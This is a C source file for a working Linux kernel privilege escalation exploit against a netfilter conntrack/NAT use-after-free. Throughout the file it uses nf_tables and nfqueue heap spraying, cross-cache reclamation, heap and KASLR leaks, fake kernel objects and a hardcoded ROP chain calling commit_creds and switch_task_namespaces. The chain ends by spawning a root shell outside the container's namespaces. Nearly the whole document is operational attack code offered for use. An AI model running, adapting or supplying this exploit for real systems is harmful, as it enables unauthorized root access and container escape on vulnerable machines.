#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "./helpers.h" #include "./helpers_nfqueue.h" #define NFT_NOTRACK_OPS 0x1d430a0 #define INIT_NSPROXY 0x2876900 #define COMMIT_CREDS 0x01d4400 #define FIND_TASK_BY_VPID 0x01cab70 #define SWITCH_TASK_NAMESPACES 0x01d2880 #define KPTI_TRAMPOLINE 0x01401190 + 54 // swapgs_restore_regs_and_return_to_usermode + offset #define INIT_CRED 0x2876b40 #define PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F 0x0a5b286 // push rsi ; xchg bx, ax ; jmp QWORD PTR [rsi+0xf] #define POP_RSP_R13_R14_R15_RET 0x01f1afb // pop rsp ; pop r13 ; pop r14 ; pop r15 ; jmp 0xffffffff8125d450 (smp_call_function_single_async) -> ret #define POP_RDI_RET 0x00dd45d // pop rdi ; ret #define POP_RSI_RET 0x026d67e // pop rsi ; ret #define POP_RDX_RET 0x0228ce2 // pop rdx ; ret #define MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET 0x0e4620d // mov rdi, rax ; mov rax, rdi ; pop rbx ; jmp 0xffffffff82605040 (__x86_return_thunk) -> ret #define UDP_PORT 56789 #define QUEUE_NUM 2 // This enum is used by queue points to determine which packet should be queued. enum signal_for_queue { SIGNAL_SPRAY, // queue spray packet SIGNAL_PERCPU_TMPL_NF_CONN, // queue percpu nf_conn packet SIGNAL_TMP_TMPL_NF_CONN // queue temporary template nf_conn packet }; #define UDP_HEADER_SIZE 8 #define SLAB_CHUNK_SIZE_256 256 #define IPS_CONFIRMED_BIT 3 // CROSS CACHE PARAMS #define OBJ_PER_SLAB_256 16 #define CPU_PARTIALS_SLABS_256 7 #define MIN_PARTIAL_256 5 #define CROSS_CACHE_DEFRAGMENTATION_SIZE 200 #define CROSS_CACHE_PRE_PRE_SIZE (OBJ_PER_SLAB_256 * (1 + MIN_PARTIAL_256)) #define CROSS_CACHE_PRE_SIZE (OBJ_PER_SLAB_256) #define CROSS_CACHE_POST_SIZE (OBJ_PER_SLAB_256 - 1) #define CROSS_CACHE_POST_POST_SIZE (OBJ_PER_SLAB_256 * (1 + CPU_PARTIALS_SLABS_256)) int spray_cross_cache_defragment[CROSS_CACHE_DEFRAGMENTATION_SIZE]; int spray_cross_cache_pre_pre[CROSS_CACHE_PRE_PRE_SIZE]; int spray_cross_cache_pre[CROSS_CACHE_PRE_SIZE]; int spray_cross_cache_post[CROSS_CACHE_POST_SIZE]; int spray_cross_cache_post_post[CROSS_CACHE_POST_POST_SIZE]; // SPRAY PARAMS #define SPRAY_BATCHES 32 #define SPRAY_NOT_STRESS_BATCHES 4 // use this instead of SPRAY_BATCHES when the cache has only a few freed chunks #define SPRAY_BATCH_SIZE 32 // SIZE AND OFFSETS #define NFT_RULE_SIZE 0x18 #define NFT_EXPR_SIZE 0x8 #define NFT_LOG_SIZE 0x18 #define NFT_USERDATA_OFFS_DATA sizeof(struct nft_userdata) #define NF_CONN_OFFS_CT_GENERAL 0x0 #define NF_CONN_OFFS_CT_STATUS 0x80 #define NF_CONN_OFFS_CT_NET 0x88 #define NF_CONN_OFFS_NAT_BYSOURCE 0x90 #define NF_CONN_OFFS_EXT 0xb0 #define NET_OFFS_CT 0x9c0 #define NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB 0x10 #define NFT_EXPR_OPS_OFFS_DEACTIVATE 0x28 // nf_ct_ext #define NF_CT_EXT_NUM 9 #define NF_CT_EXT_LABELS 7 struct nf_ct_ext { uint8_t offset[NF_CT_EXT_NUM]; uint8_t len; unsigned int gen_id; char data[]; }; #define BATCH_BUFFER_SIZE 1048576 // 1M buffer should be enough #define NUMBER_OF_NOTRACK_EXPRS 13 // Use 13 notrack expressions as padding to align nft_log.prefix with the UAF write offset. #define FAKE_EXT_OFFSET (SLAB_CHUNK_SIZE_256 - sizeof(struct nf_ct_ext)) // offset of the fake nf_ct_ext inside chunk 256, place fake ext at the bottom of chunk 256, right before adj nft_rule #define JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE 0xc8 // offset 0xc8 of nft_rule <=> expr->ops->deactivate sock nlsock; const uint16_t family = NFPROTO_IPV4; uint64_t user_cs, user_ss, user_rflags, user_sp; uint64_t leaked_first_tmpl_nf_conn_addr = 0, vmlinux = 0; char buf[0xffff]; // general purpose buf // id of the packet in netfilter queue uint32_t packet_id_first_nf_conn; uint32_t packet_id_second_nf_conn; // handle of the nft_rule that re-use the memmory dangling in nf_nat_bysource list (original owned by the first nf_conn) uint64_t rule_handle_first_nf_conn; const char base_table[] = "base_table"; const char table_spray_name[] = "table_spray_name"; const char chain_spray_name[] = "chain_spray_name"; void save_state() { __asm__(".intel_syntax noprefix;" "mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ".att_syntax;"); } void after_privesc_as_root() { INFO("Returned to userland"); setns(open("/proc/1/ns/mnt", O_RDONLY), 0); setns(open("/proc/1/ns/pid", O_RDONLY), 0); setns(open("/proc/1/ns/net", O_RDONLY), 0); char *args[] = {"/bin/bash", "-i", NULL}; execve(args[0], args, NULL); } void write_to_file(const char *which, const char *format, ...) { FILE *fu = fopen(which, "w"); va_list args; va_start(args, format); if (vfprintf(fu, format, args) < 0) { ERROR("cannot write"); exit(1); } fclose(fu); } int loopback_up() { struct ifreq ifr; int sockfd; // Create a socket to perform ioctl operations sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd < 0) { perror("Socket creation failed"); return 1; } // Specify the interface name ("lo" for loopback) strncpy(ifr.ifr_name, "lo", IFNAMSIZ); // Get the current flags for the interface if (ioctl(sockfd, SIOCGIFFLAGS, &ifr) < 0) { perror("Failed to get interface flags"); close(sockfd); return 1; } // Set the IFF_UP flag to bring the interface up ifr.ifr_flags |= IFF_UP; // Apply the new flags to the interface if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) { perror("Failed to set interface flags"); close(sockfd); return 1; } INFO("Loopback interface 'lo' is now up."); close(sockfd); return 0; } int setup(void) { uid_t uid = getuid(); gid_t gid = getgid(); // In order to use nf_tables, we need CAP_NET_ADMIN INFO("Setting up user namespace"); if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) { ERROR("unshare(CLONE_NEWUSER | CLONE_NEWNET)"); return -1; } INFO("Pinning process to CPU #0"); cpu_set_t set; CPU_ZERO(&set); CPU_SET(0, &set); if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) { ERROR("sched_setaffinity"); return -1; } // now we map uid and gid write_to_file("/proc/self/uid_map", "0 %d 1", uid); // deny setgroups (see user_namespaces(7)) write_to_file("/proc/self/setgroups", "deny"); // remap gid write_to_file("/proc/self/gid_map", "0 %d 1", gid); loopback_up(); return 0; } int setup_nft_base_table() { table t = make_table(base_table, family, NULL, 0); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_new_table(b, t, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } int vuln_setup() { char c_pre_conntrack_name[] = "pre_conntrack_chain"; char c_post_conntrack_name[] = "post_conntrack_chain"; chain c_pre_conntrack = make_chain(base_table, c_pre_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK - 1, NULL); expr e_notrack = make_notrack_expr(); rule r_pre_conntrack = make_rule(base_table, c_pre_conntrack_name, &e_notrack, 1, NULL, 0, 0); chain c_post_conntrack = make_chain(base_table, c_post_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK + 1, NULL); expr e_ct_set_zone = make_ct_set_zone_expr(NFT_REG32_00); rule r_post_conntrack = make_rule(base_table, c_post_conntrack_name, &e_ct_set_zone, 1, NULL, 0, 0); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_new_chain(b, c_pre_conntrack, family); batch_new_chain(b, c_post_conntrack, family); batch_new_rule(b, r_pre_conntrack, family); batch_new_rule(b, r_post_conntrack, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } int register_base_nat_chain() { // The hooknum can be any valid Netfilter hook chain c_nat = make_chain(base_table, "nat_chain", 0, NF_INET_POST_ROUTING, 0, "nat"); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_new_chain(b, c_nat, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } // Register a chain with a rule that queues packets based on the first byte of their payload int register_conditional_queue_point(char *chain_name, uint32_t hooknum, uint32_t prio, uint8_t byte_to_compare) { chain c = make_chain(base_table, chain_name, 0, hooknum, prio, NULL); expr e_payload = make_payload_expr(NFT_PAYLOAD_TRANSPORT_HEADER, UDP_HEADER_SIZE, 1, NFT_REG32_00); expr e_cmp = make_cmp_expr(NFT_REG32_00, NFT_CMP_EQ, byte_to_compare); expr e_queue = make_queue_expr(QUEUE_NUM, 0, 0); expr list_e[3] = {e_payload, e_cmp, e_queue}; rule r = make_rule(base_table, chain_name, list_e, ARRAY_SIZE(list_e), NULL, 0, 0); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_new_chain(b, c, family); batch_new_rule(b, r, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } void update_labels_to_overwrites_ops() { char buf[MNL_SOCKET_BUFFER_SIZE]; struct nlmsghdr *nlh; struct nlattr *nest; // Release the packet from the "nf_conn_queue_point_2" queue point. nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, QUEUE_NUM); nfq_nlmsg_verdict_put(nlh, packet_id_second_nf_conn, NF_ACCEPT); uint64_t adj_nft_rule_addr = leaked_first_tmpl_nf_conn_addr + SLAB_CHUNK_SIZE_256; uint64_t fake_ops_addr = adj_nft_rule_addr + JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_EXPR_OPS_OFFS_DEACTIVATE; uint64_t orig_ops_addr = vmlinux + NFT_NOTRACK_OPS; uint8_t cta_labels[16] = {0}; uint8_t cta_masks[16] = {0}; *(uint64_t *)&cta_labels[0x0] = fake_ops_addr ^ orig_ops_addr; nest = mnl_attr_nest_start(nlh, NFQA_CT); mnl_attr_put(nlh, CTA_LABELS, 16, cta_labels); mnl_attr_put(nlh, CTA_LABELS_MASK, 16, cta_masks); mnl_attr_nest_end(nlh, nest); if (mnl_socket_sendto(nlsock_queue, nlh, nlh->nlmsg_len) < 0) { perror("mnl_socket_send"); exit(EXIT_FAILURE); } // This packet will be stopped at "nf_conn_queue_point_3". Keep it alive to avoid potential errors from it being freed. } void send_udp_packet(uint8_t first_byte) { int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); struct sockaddr_in addr; addr.sin_family = AF_INET; addr.sin_port = htons(UDP_PORT); addr.sin_addr.s_addr = inet_addr("127.0.0.1"); sendto(sock, &first_byte, 1, 0, (struct sockaddr *)&addr, sizeof(addr)); close(sock); } int setup_chain_to_spray_nft_rule() { table t_spray = make_table(table_spray_name, family, NULL, 0); chain c_spray = make_chain(table_spray_name, chain_spray_name, 0, -1, 0, NULL); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_new_table(b, t_spray, family); batch_new_chain(b, c_spray, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } int alloc_nf_conn() { // send a packet to alloc a temporary template nf_conn in the function `nft_ct_set_zone_eval()` // this template nf_conn stays alive until the user sends a DROP verdict to drop the packet send_udp_packet(SIGNAL_SPRAY); int id_in_queue = queue_recv(queue_get_id_cb); // recv the packet at "before_nat_chain" queue point return id_in_queue; } #define FIRST_SPRAY_MIN_RULE_HANDLE 2 // handle for rule used to spray start from 2 #define FIRST_SPRAY_MAX_RULE_HANDLE (SPRAY_BATCHES * SPRAY_BATCH_SIZE + FIRST_SPRAY_MIN_RULE_HANDLE - 1) int dump_exprs(const struct nlmsghdr *nlh, void *data) { rule r = nftnl_rule_alloc(); nftnl_rule_nlmsg_parse(nlh, r); struct nftnl_expr_iter *iter = nftnl_expr_iter_create(r); // Skip notrack exprs for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++) nftnl_expr_iter_next(iter); // Retrieve the content of the prefix field const char *leaked = nftnl_expr_get_str(nftnl_expr_iter_next(iter), NFTNL_EXPR_LOG_PREFIX); if (leaked) { leaked_first_tmpl_nf_conn_addr = (*(uint64_t *)leaked) - NF_CONN_OFFS_NAT_BYSOURCE; INFO("Heap address of the first tmpl nf_conn addr: 0x%lx", leaked_first_tmpl_nf_conn_addr); } nftnl_expr_iter_destroy(iter); nftnl_rule_free(r); return MNL_CB_OK; } int leak_heap_first_tmpl_nf_conn() { char buf[MNL_SOCKET_BUFFER_SIZE]; rule r; nlmsghdr hdr; // One of these rules contains the overwritten prefix. By dumping the prefix field, we leak the heap address of the chunk used by the first template nf_conn. for (uint64_t handle = FIRST_SPRAY_MIN_RULE_HANDLE; handle <= FIRST_SPRAY_MAX_RULE_HANDLE; handle++) { r = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle); rseq = seq; hdr = dump_rule(r, buf, family); nftnl_rule_free(r); if (mnl_socket_sendto(nlsock, buf, hdr->nlmsg_len) < 0) { ERROR("mnl_socket_sendto"); return -1; } if (run_callbacks(nlsock, dump_exprs, NULL) < 0) { ERROR("run_callbacks leak_heap: primitive"); return -1; } if (leaked_first_tmpl_nf_conn_addr) { rule_handle_first_nf_conn = handle; // Save the handle of the rule that reclaimed the freed chunk. return 0; } } return -1; } int queue_leak_kaslr_cb(const struct nlmsghdr *nlh, void *data) { struct nfqnl_msg_packet_hdr *ph = NULL; char *ct_ext; struct nlattr *attr[NFQA_MAX + 1] = {}; if (nfq_nlmsg_parse(nlh, attr) < 0) { perror("problems parsing"); return MNL_CB_ERROR; } ph = mnl_attr_get_payload(attr[NFQA_PACKET_HDR]); ct_ext = mnl_attr_get_payload(attr[NFQA_CT]); packet_id_second_nf_conn = ntohl(ph->packet_id); // 0x4c is the offset of the labels data inside the received payload. // Use a hard-coded offset to quickly retrieve the value. vmlinux = *(uint64_t *)&ct_ext[0x4c] - NFT_NOTRACK_OPS; INFO("Leaked vmlinux: 0x%lx", vmlinux); return MNL_CB_OK; } int leak_kaslr() { // The second template nf_conn is now completely under attacker control. // Release the packet from the "nf_conn_queue_point_1" queue point. nfq_send_verdict(QUEUE_NUM, packet_id_second_nf_conn, NF_ACCEPT); INFO("Try to recv, if exploit gets stuck here, the cross-cache likely didn't hit and the packet was dropped"); queue_recv(queue_leak_kaslr_cb); // recv the packet from "nf_conn_queue_point_2" queue point return 0; } int spray_nft_tables_udata_kmalloc_cg_256_fake_ext() { int table_spray_counter = 0; char udata[SLAB_CHUNK_SIZE_256] = {0}; struct nf_ct_ext *fake_nf_ct_ext = (struct nf_ct_ext *)&udata[FAKE_EXT_OFFSET]; fake_nf_ct_ext->offset[NF_CT_EXT_LABELS] = sizeof(struct nf_ct_ext) + NFT_RULE_SIZE; // => labels's offset points to notrack ops inside adjacent nft_rule fake_nf_ct_ext->len = 0; fake_nf_ct_ext->gen_id = 0; for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; ++i) { batch b = batch_init(BATCH_BUFFER_SIZE); for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) { char table_name[32]; sprintf(table_name, "tsrp-1-%d", table_spray_counter++); table t = make_table(table_name, family, udata, sizeof(udata)); batch_new_table(b, t, family); nftnl_table_free(t); } if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0) return -1; } return 0; } int del_target_rule(uint32_t handle) { rule r = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_del_rule(b, r, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } int update_adjacent_nft_rule_udata_with_ROP() { // The only way to update the udata of an nft_rule is to free the rule and spray again. // 1. Free adjacent nft_rule // Calculate the handle range for the adj nft_rules int32_t lower_bound_adj_rule_handle = rule_handle_first_nf_conn - (OBJ_PER_SLAB_256 - 1); lower_bound_adj_rule_handle = lower_bound_adj_rule_handle < FIRST_SPRAY_MIN_RULE_HANDLE ? FIRST_SPRAY_MIN_RULE_HANDLE : lower_bound_adj_rule_handle; int32_t upper_bound_adj_rule_handle = rule_handle_first_nf_conn + (OBJ_PER_SLAB_256 - 1); upper_bound_adj_rule_handle = upper_bound_adj_rule_handle > FIRST_SPRAY_MAX_RULE_HANDLE ? FIRST_SPRAY_MAX_RULE_HANDLE : upper_bound_adj_rule_handle; for (int32_t handle = lower_bound_adj_rule_handle; handle <= upper_bound_adj_rule_handle; handle++) { if (handle == rule_handle_first_nf_conn) continue; del_target_rule(handle); } // @sleep(kernel_func="nft_commit_release", // desc="wait for adjacent nft_rule to be freed") usleep(100 * 1000); // 2. Spray nft_rules with udata containing the ROP chain. const size_t udata_len = SLAB_CHUNK_SIZE_256 - NFT_RULE_SIZE - NFT_EXPR_SIZE - sizeof(struct nft_userdata); char udata[udata_len]; memset(udata, 0, udata_len); // the jop gadget jumps to [rsi + 0xf] so we put the stack pivot gadget there *(uint64_t *)&udata[0xf - NFT_EXPR_SIZE] = vmlinux + POP_RSP_R13_R14_R15_RET; uint64_t *rop = (uint64_t *)&udata[0x10]; // commit_creds(&init_cred) *rop++ = vmlinux + POP_RDI_RET; *rop++ = vmlinux + INIT_CRED; *rop++ = vmlinux + COMMIT_CREDS; // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) *rop++ = vmlinux + POP_RDI_RET; *rop++ = 1; *rop++ = vmlinux + FIND_TASK_BY_VPID; *rop++ = vmlinux + MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET; *rop++ = 0; *rop++ = vmlinux + POP_RSI_RET; *rop++ = vmlinux + INIT_NSPROXY; *rop++ = vmlinux + SWITCH_TASK_NAMESPACES; // return to userspace *rop++ = vmlinux + KPTI_TRAMPOLINE; rop++; rop++; *rop++ = (uint64_t)after_privesc_as_root; *rop++ = user_cs; *rop++ = user_rflags; *rop++ = user_sp; *rop++ = user_ss; // jop gadget, put here because this space is unused. rsi is pointing to fake_expr // we can use either of the following, they are equivalent *rop++ = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F; // or #define NFT_RULE_OFFS_NFT_USERDATA (NFT_RULE_SIZE + NFT_EXPR_SIZE) *(uint64_t *)&udata[JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_RULE_OFFS_NFT_USERDATA] = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F; // It’s okay to comment out either one of the two. expr e_notrack = make_notrack_expr(); // The ops of this notrack expression will be overwritten later. // Because data in struct nft_userdata starts at offset 1, we send udata from offset 1 to keep everything aligned. rule r = make_rule(table_spray_name, chain_spray_name, &e_notrack, 1, &((struct nft_userdata *)&udata)->data, sizeof(udata) - NFT_USERDATA_OFFS_DATA, 0); for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; i++) { batch b = batch_init(BATCH_BUFFER_SIZE); for (int j = 0; j < SPRAY_BATCH_SIZE; j++) { batch_new_rule(b, r, family); } if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0) return -1; } return 0; } int spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn() { int table_spray_counter = 0; char fake_nf_conn[256] = {0}; *(uint32_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_GENERAL]) = 1; // set refcnt = 1 // set status = CONFIRMED to skip function `__nf_conntrack_update()` in `nf_conntrack_update()`. flow: nfqnl_recv_verdict()->nfqnl_reinject()->nf_conntrack_update() *(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_STATUS]) = 1 << IPS_CONFIRMED_BIT; // prevents null deref at line `rcu_access_pointer(net->ct.nf_conntrack_event_cb)` in `nf_conntrack_event_cache()` // Just needs to be set to a valid memory address (e.g., leaked_first_tmpl_nf_conn_addr). *(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_NET]) = leaked_first_tmpl_nf_conn_addr - (NET_OFFS_CT + NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB); // Set ext to point to the fake nf_ct_ext we placed at the bottom of the leaked address chunk. *(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_EXT]) = leaked_first_tmpl_nf_conn_addr + FAKE_EXT_OFFSET; for (int i = 0; i < SPRAY_BATCHES; ++i) { batch b = batch_init(BATCH_BUFFER_SIZE); for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) { char table_name[32]; sprintf(table_name, "tsrp-2-%d", table_spray_counter++); table t = make_table(table_name, family, fake_nf_conn, sizeof(fake_nf_conn)); batch_new_table(b, t, family); nftnl_table_free(t); } if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0) return -1; } return 0; } int escalate() { batch b; rule del_rule = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, 0); b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_del_rule(b, del_rule, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } void spray_cross_cache_pre_alloc() { // 1. DEFRAG kmalloc-256 for (int i = 0; i < CROSS_CACHE_DEFRAGMENTATION_SIZE; i++) { spray_cross_cache_defragment[i] = alloc_nf_conn(); } // 2. pre pre allocate for (int i = 0; i < CROSS_CACHE_PRE_PRE_SIZE; i++) { spray_cross_cache_pre_pre[i] = alloc_nf_conn(); } // 3. pre allocate for (int i = 0; i < CROSS_CACHE_PRE_SIZE; i++) { spray_cross_cache_pre[i] = alloc_nf_conn(); } } // alloc target between spray_cross_cache_pre_alloc() and spray_cross_cache_post_alloc() void spray_cross_cache_post_alloc() { // 5. post allocate for (int i = 0; i < CROSS_CACHE_POST_SIZE; i++) { spray_cross_cache_post[i] = alloc_nf_conn(); } // 6. post post allocate for (int i = 0; i < CROSS_CACHE_POST_POST_SIZE; i++) { spray_cross_cache_post_post[i] = alloc_nf_conn(); } } void cross_cache_pre_free() { // 7. pre pre free for (int i = 0; i < CROSS_CACHE_PRE_PRE_SIZE; i++) { nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre_pre[i], NF_DROP); } // 8. pre free for (int i = 0; i < CROSS_CACHE_PRE_SIZE; i++) { nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre[i], NF_DROP); } } // free target between cross_cache_pre_free() and cross_cache_post_free() void cross_cache_post_free() { // 9. post free for (int i = 0; i < CROSS_CACHE_POST_SIZE; i++) { nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post[i], NF_DROP); } // 11. post post free for (int i = 0; i < CROSS_CACHE_POST_POST_SIZE; i++) { nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post_post[i], NF_DROP); } } int spray_nft_rule_kmalloc_cg_256() { const int number_of_exprs = NUMBER_OF_NOTRACK_EXPRS + 1; // + 1 for nft_log expression int udata_size = SLAB_CHUNK_SIZE_256; // craft a rule in cache 256 udata_size -= NFT_RULE_SIZE; udata_size -= NFT_EXPR_SIZE * number_of_exprs; // this rule contains NUMBER_OF_NOTRACK_EXPRS expressions, notrack expression doesn't have private data. udata_size -= NFT_LOG_SIZE; // nft_log expression has private data udata_size -= sizeof(struct nft_userdata); char udata[udata_size]; memset(udata, 0, udata_size); expr list_e[number_of_exprs]; // notrack exprs are used as padding for nft_log for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++) { list_e[i] = make_notrack_expr(); } expr e_log = make_log_expr(NULL); list_e[number_of_exprs - 1] = e_log; // nft_log.prefix field is located at offset 0x98 of nft_rule. It matches the offset of the uaf write. rule r = make_rule(table_spray_name, chain_spray_name, list_e, ARRAY_SIZE(list_e), udata, sizeof(udata), 0); for (int i = 0; i < SPRAY_BATCHES; i++) { batch b = batch_init(BATCH_BUFFER_SIZE); for (int j = 0; j < SPRAY_BATCH_SIZE; j++) { batch_new_rule(b, r, family); } if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0) return -1; } return 0; } int setup_netfilter() { INFO("Creating netfilter netlink socket"); if ((nlsock = mnl_socket_open(NETLINK_NETFILTER)) == NULL) { ERROR("mnl_socket_open(): nlsock"); return -1; } if (mnl_socket_bind(nlsock, 0, MNL_SOCKET_AUTOPID) < 0) { ERROR("mnl_socket_bind"); return -1; } setup_nf_queue(); setup_nft_base_table(); vuln_setup(); // "before_nat_chain" queue point blocks spray packets entering base NAT chain while keeping them alive. register_conditional_queue_point("before_nat_chain", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC - 1, SIGNAL_SPRAY); register_base_nat_chain(); // The "nf_conn_queue_point_*" queue point queues two sk_buffs with temporary template nf_conns used to interact with the vulnerability. register_conditional_queue_point("nf_conn_queue_point_1", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 1, SIGNAL_TMP_TMPL_NF_CONN); register_conditional_queue_point("nf_conn_queue_point_2", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 2, SIGNAL_TMP_TMPL_NF_CONN); register_conditional_queue_point("nf_conn_queue_point_3", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 3, SIGNAL_TMP_TMPL_NF_CONN); // "after_nf_confirm" queue point is used to keep the sk_buff with percpu template nf_conn of nft_ct_zone_eval() alive, allows us to use the temporary nf_conn of nft_ct_zone_eval(). // Note: We can't queue a sk_buff containing an unconfirmed nf_conn with refcount greater than 1, read nf_ct_drop_unconfirmed(). // Register this queue point after `nf_confirm()` function. register_conditional_queue_point("after_nf_confirm", NF_INET_PRE_ROUTING, NF_IP_PRI_FIRST, SIGNAL_PERCPU_TMPL_NF_CONN); setup_chain_to_spray_nft_rule(); return 0; } int main() { save_state(); if (setup() == -1) return -1; setup_netfilter(); send_udp_packet(SIGNAL_PERCPU_TMPL_NF_CONN); // attach per-cpu template nf_conn to this packet queue_recv(NULL); // recv the packet from "after_nf_confirm" queue point. Keeping this packet alive keeps the per-CPU template busy, allowing us to use a temporary template nf_conn. INFO("I: CROSS CACHE: kmalloc-256 (struct nf_conn) -> kmalloc-cg-256 (struct nft_rule)"); spray_cross_cache_pre_alloc(); INFO("Allocate the first template nf_conn + link it to nf_nat_bysource"); send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN); // attach temporary template nf_conn to this packet packet_id_first_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point spray_cross_cache_post_alloc(); cross_cache_pre_free(); INFO("Drop the packet with the first template nf_conn, leaving a dangling pointer in nf_nat_bysource hash table"); nfq_send_verdict(QUEUE_NUM, packet_id_first_nf_conn, NF_DROP); cross_cache_post_free(); INFO("Reclaim the first template nf_conn (kmalloc-256) with nft_rule (kmalloc-cg-256)"); spray_nft_rule_kmalloc_cg_256(); INFO("I: end CROSS CACHE"); INFO("II: CROSS CACHE: kmalloc-256 (nf_conn) -> kmalloc-cg-256 (nft_tables->udata)"); spray_cross_cache_pre_alloc(); INFO("Allocate second template nf_conn + link it to nf_nat_bysource => trigger uaf write"); send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN); packet_id_second_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point leak_heap_first_tmpl_nf_conn(); spray_cross_cache_post_alloc(); cross_cache_pre_free(); // Deleting the nft_rule triggers nft_log_destroy(), which frees nft_log.prefix, currently pointing to the middle of the second template nf_conn. INFO("Free nft_rule => free second template nf_conn"); del_target_rule(rule_handle_first_nf_conn); // @sleep(kernel_func="nft_commit_release", // desc="wait for victim rule to be freed") usleep(100 * 1000); INFO("Reclaim freed nft_rule (kmalloc-cg-256) with nft_table.udata (kmalloc-cg-256)"); spray_nft_tables_udata_kmalloc_cg_256_fake_ext(); cross_cache_post_free(); INFO("Reclaim the second template nf_conn (kmalloc-256) with nft_table.udata (kmalloc-cg-256)"); spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn(); INFO("II: end CROSS CACHE"); leak_kaslr(); update_adjacent_nft_rule_udata_with_ROP(); update_labels_to_overwrites_ops(); escalate(); return 0; }